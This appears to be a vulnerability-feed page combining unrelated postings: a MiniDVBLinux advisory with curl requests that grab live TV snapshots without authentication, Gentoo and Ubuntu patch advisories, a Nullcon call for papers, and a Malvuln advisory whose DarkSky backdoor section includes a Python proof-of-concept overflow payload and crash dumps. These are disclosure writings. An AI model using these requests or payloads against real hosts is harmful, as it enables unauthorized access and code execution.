MiniDVBLinux versions 5.4 and below suffer from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

    MiniDVBLinux 5.4 Unauthenticated Stream Disclosure VulnerabilityVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application suffers from an unauthenticated live streamdisclosure when /tpl/tv_action.sh is called and generates a snapshotin /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).--------------------------------------------------------------------/var/www/tpl/tv_action.sh:--------------------------01: #!/bin/sh02:03: header04:05: quality=6006: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=$.*$&height=$.*$/\1 \2/g")"07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null--------------------------------------------------------------------Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5716Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php24.09.2022--1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8250 Grabbed image /tmp/tv.jpg 60221 mld closing connection2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg3. Or use a browser: - http://ip:8008/home?site=remotecontrol

MiniDVBLinux 5.4 Unauthenticated Stream Disclosure

Gentoo Linux Security Advisory 202210-6 - Multiple vulnerabilities have been discovered in libvirt, the worst of which could result in denial of service. Versions less than 8.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: libvirt: Multiple Vulnerabilities  
     Date: October 16, 2022  
     Bugs: #746119, #799713, #812317, #836128  
       ID: 202210-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in libvirt, the worst of  
which could result in denial of service.

Background  
==========

libvirt is a C toolkit for manipulating virtual machines.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/libvirt      < 8.2.0                      >= 8.2.0  
  2  dev-python/libvirt-python  < 8.2.0                      >= 8.2.0

Description  
===========

Multiple vulnerabilities have been discovered in libvirt. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libvirt users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/libvirt-8.2.0"

All libvirt-python users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/libvirt-python-8.2.0"

References  
==========

[ 1 ] CVE-2020-14339  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14339  
[ 2 ] CVE-2020-25637  
      https://nvd.nist.gov/vuln/detail/CVE-2020-25637  
[ 3 ] CVE-2021-3631  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3631  
[ 4 ] CVE-2021-3667  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3667  
[ 5 ] CVE-2022-0897  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0897

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-06

The Nullcon Berlin 2023 Call For Papers is open. It will take place March 9th through the 10th, 2023 in Berlin, Germany.

Submit your security research and present your work at Nullcon Berlin 2023. Don't miss out on EARLY discount for Nullcon Online Trainings.

Facebook (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL5Q3l0fQV1-WJV7CgZnLW2YDD233nRG9dN4lR5QBhCS2pV4mKFb5bLmhRN801xdvbWSSsW9kZWJG2h3S_rW7gRCQZ7ZHcDpW899Lm26lXD19W371Yhh3J_5fpW98YPmL9llkqMW6ZrR9v3_0h_zW3Ynxps2pbcm4VRXYRs61fsKVW2k1qqk9bkMDlW4LtBz31y0lqkW7Md09Y6Zrl2JVsFk1b52TWYwW8CDtlJ8y7968VcNGQD1b9gZPW4zYX0Z7gPYT3W8bMfyh7kpygGW4Cfgpc4nbgFrW2-Vl9j93DSDBW2t53p_3MFjWdW2NwcRG5xhxZq31DX1 )

Change the way you share your InfoSec research in the industry! If you are a security researcher, a hacker, a security engineer, or any InfoSec professional—Nullcon Berlin 2023 Call For Papers (CFP) is your platform where you "could, should, and must" showcase the unique ways and ideas that you have contributed towards cybersecurity.

CFP: 03rd October 2022 to 30th November 2022

Training: 06th-08th March 2023

Conference: 09th-10th March 2023

SUBMIT MY CFP  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL5w3l0fwV1-WJV7CgFpkVfQcZr1drlNYW4r8-rg1pTrQ_W64Py4R1s1xMCS2XR95ykh_Vm-YJf4xv9ggW4rsCfr6p8GjXW6xkZjj1bNqjLN7VcwT5PQjXMVYtkT521c63VW25lJdk59d2pNN7nnjqVfcnkQVP0Y8d232vWqW8J89Bq7W7lmXW5WTRK53Rwv6MW6-9BlZ1Dhp-5W8dxN5y2xd7phW4tLY948x0-jfW8XJ66d8QM067W6ML1y01zCWwXW5FwskX41Q0mYW5z844D2GnFKhW1x7Yr751CgvX3kqK1 )

Tips for Submitting:

Submit Early: Submitting early increases the chance of acceptance in the first round of review itself. The more you delay, the more competition you have with other papers that are submitted later.

Technical Description: The more concrete technical details you provide the better chance you have of getting accepted. Reviewers usually give a low score to submissions that have very small or vague abstracts and many not request further details. The best way is to provide a supporting full technical paper that explains all the vulnerabilities, exploits, etc in detail.

Research Categories:

New Research: A research topic that has not been presented/published or is not going to be presented/published before Nullcon Berlin 2023.

Desi Jugaad: It is a Hindi word for "Local Hacks." This category is dedicated to hackers who find innovative tech/non-tech solutions for real-life challenges.

Current Research: A research topic that has already been presented/published partly or wholly before Nullcon Berlin 2023.

Learn More About CFP Process  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL5w3l0fwV1-WJV7CgFpkVfQcZr1drlNYW4r8-rg1pTrQ_W64Py4R1s1xMCS2XR95ykh_Vm-YJf4xv9ggW4rsCfr6p8GjXW6xkZjj1bNqjLN7VcwT5PQjXMVYtkT521c63VW25lJdk59d2pNN7nnjqVfcnkQVP0Y8d232vWqW8J89Bq7W7lmXW5WTRK53Rwv6MW6-9BlZ1Dhp-5W8dxN5y2xd7phW4tLY948x0-jfW8XJ66d8QM067W6ML1y01zCWwXW5FwskX41Q0mYW5z844D2GnFKhW1x7Yr751CgvX3kqK1 )

Nullcon Training December 2022

Get Certified. Get Upskilled.

Know More About The Trainings  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL5w3l0fwV1-WJV7CgXy8W1qTymM2TyfH6W8zczNM23QXW8VsDcf76vpxtgW5SJc_n6RGVJpV281NB1j7RGGW38HNHW170Bm6W4BS96g3XPL_lVZVnvg3tSJHQW8vTdXb6BfjLRW2-MrdX6DdVbCW2S0yZh51cf5CW3Szyzz66HQ63W6vhk5j406KX8W4p0V7P8pgYN-W7nXKD273khwWW21GwVs8trx7RW4zRHXN6R45CyW4WgRdX2gv915W4LfPzz6W7jqXW4lX8d81lnjCbW7SBk4K8FzLsDN42CpS5Dy6dm32311 )

Gain Technical Skills:

Learn Technical Skills that will benefit you inside and outside of the Training session.

Applicable Coursework:

Directly apply your learnings and coursework to your full-time job for upskilling and to stay current in the industry.

Hands-On Session:

The trainees will be taught to be independent by working on real-world situations and experiences.

Click here to access photos (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL6p3l0gpV1-WJV7Cg-djW4cdZQS1Vb0SBW8ggfJY8JwdRjW3W5g-c14_1gsW328dxz7BTnWdW1jQkZy870_1dW2D7bM_6P5x9zW8d5l8d6Ypry9W23H31G90T52gW1-ZZxF36XY_6V9DG_l8QR-5BW4K1nMz7LQlNmN1RbSJLcvf_DW7SQ0BK24X1lbW2LBWbM6j8rbwN2x1X4wDxYw_W5x1GCG8kYYpBW8s84Sl67p4vLW5lfDY41HbQdyW3mNZV_8KJy6sMQV1m7Q0SnMW72f_jC4TJRQTW6jfqzW375pb2W2znhTs3PbtX5W1Wm4G32S9njkW24kGv61-4NP1W4J3ntH20yMSdW18ZBMN6qS8hdW65vr9x6bYZjD35nW1 ) and videos (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVDqPb2HTYjpV-tR9046hQ_VW6phD5r4R6GMyN8wLL5Q3l0fQV1-WJV7CgCjnW1zCL8033jFS6W8K4xyK82N-85W3m6-KB8FM_ySN7H5B3_GVQtlW3ZZRps42TnxqW3Xyj2B7GZBQTW74bCZw2-Ljd_W8Dq1mx1jTS5GW5R-x4v5fqcK7W6l9Q0C816H1bW7R8_R_6C_Z9-W3xFh3q97q8dsVQpgWx1JcVgDW8KfHM338ZPgDW9hHM116slCkCW55b-Bg3-fm29W91hJMc6gwYXTW8lpvY_1gxsvVW7K1zM_1lmBHCW7tzQPB56smFhW8jd1Wd7Fsb8xW4d1LYj1wPYWPW5kB4zS3MwdnxW8cNcPg44Fmmp3h-41 ) of Nullcon Goa 2022

Thank you #TeamNullcon

Payatu Technologies, Tej House, M.G. Road, Opp Budhani Wefers, Camp, Pune, Maharashtra 411001, India

Unsubscribe (https://hs-7328024.s.hubspotstarter.net/email-unsubscribe/email?product=emailStarter&checkSubscriptions=all&d=Vnlmhl5Z60tRW1hZ9wn3_VrSDW3T1MdZ2m7LY3W3XWJ1t4fLN6SW4cJ1zp49M9spN1JDwVNXhR99M88nPzNw4QNW6YvQF68Dvsb5VCN4Mt8f5Jb9W6rxlY55pt9SZW1MSMWM7jDJDWW5-HHM67SmFpLN9cmHfBtcj4cf47_vFx04&v=2&email=submissions%40packetstormsecurity.org&_hsenc=p2ANqtz-9hnNZ-X1T0vwp53guzOSKAWT3s4qLy7V6XmwNw_n87XXxIZomrSELu5Uv2jZQWzRVvL2DlfoRmZd1TZfCrPWXDXAabc4Td2SVrpNjxp3rEDY3iWzA&_hsmi=229704294 )

Manage preferences (https://hs-7328024.s.hubspotstarter.net/email-unsubscribe/email?product=emailStarter&d=Vnlmhl5Z60tRW1hZ9wn3_VrSDW3T1MdZ2m7LY3W3XWJ1t4fLN6SW4cJ1zp49M9spN1JDwVNXhR99M88nPzNw4QNW6YvQF68Dvsb5VCN4Mt8f5Jb9W6rxlY55pt9SZW1MSMWM7jDJDWW5-HHM67SmFpLN9cmHfBtcj4cf47_vFx04&v=2&email=submissions%40packetstormsecurity.org&_hsenc=p2ANqtz-9hnNZ-X1T0vwp53guzOSKAWT3s4qLy7V6XmwNw_n87XXxIZomrSELu5Uv2jZQWzRVvL2DlfoRmZd1TZfCrPWXDXAabc4Td2SVrpNjxp3rEDY3iWzA&_hsmi=229704294 )

Nullcon Berlin 2023 Call For Papers

Gentoo Linux Security Advisory 202210-5 - Multiple vulnerabilities have been discovered in virglrenderer, the worst of which could result in remote code execution. Versions less than 0.10.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: virglrenderer: Multiple vulnerabilities  
     Date: October 16, 2022  
     Bugs: #866821  
       ID: 202210-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in virglrenderer, the  
worst of  which could result in remote code execution.

Background  
==========

A virtual 3D GPU library, that allows the guest operating system to use  
the host GPU to accelerate 3D rendering.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/virglrenderer   < 0.10.1                    >= 0.10.1

Description  
===========

Multiple vulnerabilities have been discovered in virglrenderer. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All virglrenderer users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/virglrenderer-0.10.1"

References  
==========

[ 1 ] CVE-2022-0135  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0135  
[ 2 ] CVE-2022-0175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0175

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-05

Backdoor.Win32.DarkSky.23 malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkSky.23  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.  
Family: DarkSky  
Type: PE32  
MD5: 1164ef21ef2af97e0339359c0dce5e7d  
Vuln ID: MVID-2022-0648  
Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 10/15/2022

Example:

0040134A | 80 34 31 11              | xor byte ptr ds:[ecx+esi],11            | ;XOR converting the payload happens here.  
0040134E | 41                       | inc ecx                                 |  
0040134F | 3B C8                    | cmp ecx,eax                             |  
00401351 | 7C F7                    | jl sysarchive.40134A                    |  
00401353 | 5E                       | pop esi                                 |  
00401354 | C3                       | ret                                     |

Python test...

>>> 0x41 ^ 0x11  
80  
>>> hex(80)  
'0x50'  
>>> chr(0x50)  
'P'

GET /AAAAA will then become all "P" ...

0019D24C  56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41  VTE1>PPPPPAAAAAA    
0019D25C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D26C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D27C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D28C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA  

So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.

>>> 0x50 ^ 0x11  
65  
>>> hex(65)  
'0x41'  
>>> chr(65)  
'A'

EAX : 7EFEFEFE  
EBX : 02902A58  
ECX : 0019F4B0  
EDX : 41414141  
EBP : 0019D230  
ESP : 0019D214  
ESI : 0019D777  
EDI : 0019FF81  
EIP : 7451561B     msvcrt.7451561B

Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" 

0019D240  08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31  .ß...ß......VTE1    
0019D250  3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  >AAAAAAAAAAAAAAA    
0019D260  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D270  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D280  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50  AAAAAAAAAAAAAAAP    
0019D290  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP    
0019D2A0  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP

Memory Dump:  
(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002  
eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400          ret     14h

0:000> .ecxr  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
*** WARNING: Unable to verify checksum for SysArchive.exe  
*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

EXCEPTION_RECORD:  0019cd64 -- (.exr 0x19cd64)  
ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  SysArchive.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt  
    74515590 - msvcrt!strcat  
  [ 8b:cc ]  
    74515617 - msvcrt!strcat+87 (+0x87)  
  [ eb:cc ]  
2 errors : !msvcrt (74515590-74515617)

CONTEXT:  0019cdb4 -- (.cxr 0x19cdb4)  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
Resetting default scope

WRITE_ADDRESS:  001a0000 

FOLLOWUP_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

FAULTING_THREAD:  0000242c

BUGCHECK_STR:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 00404ed7 to 74515619

STACK_TEXT:    
0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89  
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7  
0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394  
0019f9ec 41414141 41414141 41414141 41414141 0x41414141  
0019f9f0 41414141 41414141 41414141 41414141 0x41414141  
0019f9f4 41414141 41414141 41414141 41414141 0x41414141  
0019f9f8 41414141 41414141 41414141 41414141 0x41414141  
0019f9fc 41414141 41414141 41414141 41414141 0x41414141  
0019fa00 41414141 41414141 41414141 41414141 0x41414141  
0019fa04 41414141 41414141 41414141 41414141 0x41414141  
0019fa08 41414141 41414141 41414141 41414141 0x41414141  
0019fa0c 41414141 41414141 41414141 41414141 0x41414141  
0019fa10 41414141 41414141 41414141 41414141 0x41414141  
0019fa14 41414141 41414141 41414141 41414141 0x41414141  
0019fa18 41414141 41414141 41414141 41414141 0x41414141  
0019fa1c 41414141 41414141 41414141 41414141 0x41414141  
0019fa20 41414141 41414141 41414141 41414141 0x41414141  
0019fa24 41414141 41414141 41414141 41414141 0x41414141  
0019fa28 41414141 41414141 41414141 41414141 0x41414141  
0019fa2c 41414141 41414141 41414141 41414141 0x41414141  
0019fa30 41414141 41414141 41414141 41414141 0x41414141  
...

SYMBOL_NAME:  memory_corruption!msvcrt

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: memory_corruption

IMAGE_NAME:  memory_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb

FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt

BUCKET_ID:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt

0:000> !exchain  
0019cc18: ntdll!_except_handler4+0 (77716a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (777557ad)  
0019f9dc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=5418

def doit():  
    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000  
    PAYLOAD=JUNK+"\r\n\r\n"

    s.send(PAYLOAD)  
    s.close()  
    print("Backdoor DarkSky.23 Exploit By malvuln")

if __name__=="__main__":  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow

Ubuntu Security Notice 5683-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Selim Enes Karaduman discovered that a race condition existed in the General notification queue implementation of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5683-1  
October 14, 2022

linux-ibm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

Selim Enes Karaduman discovered that a race condition existed in the  
General notification queue implementation of the Linux kernel, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-1882)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in the  
Linux kernel incorrectly handled socket buffers (skb) references when  
communicating with certain backends. A local attacker could use this to  
cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-34494, CVE-2022-34495)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Jann Horn discovered that the KVM subsystem in the Linux kernel did not  
properly handle TLB flush operations in some situations. A local attacker  
in a guest VM could use this to cause a denial of service (guest crash) or  
possibly execute arbitrary code in the guest kernel. (CVE-2022-39189)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1015-ibm     5.15.0-1015.17  
   linux-image-ibm                 5.15.0.1015.14

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5683-1  
   CVE-2021-33655, CVE-2022-1882, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33743, CVE-2022-33744, CVE-2022-34494,  
   CVE-2022-34495, CVE-2022-36879, CVE-2022-36946, CVE-2022-39189

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1015.17

Ubuntu Security Notice USN-5683-1

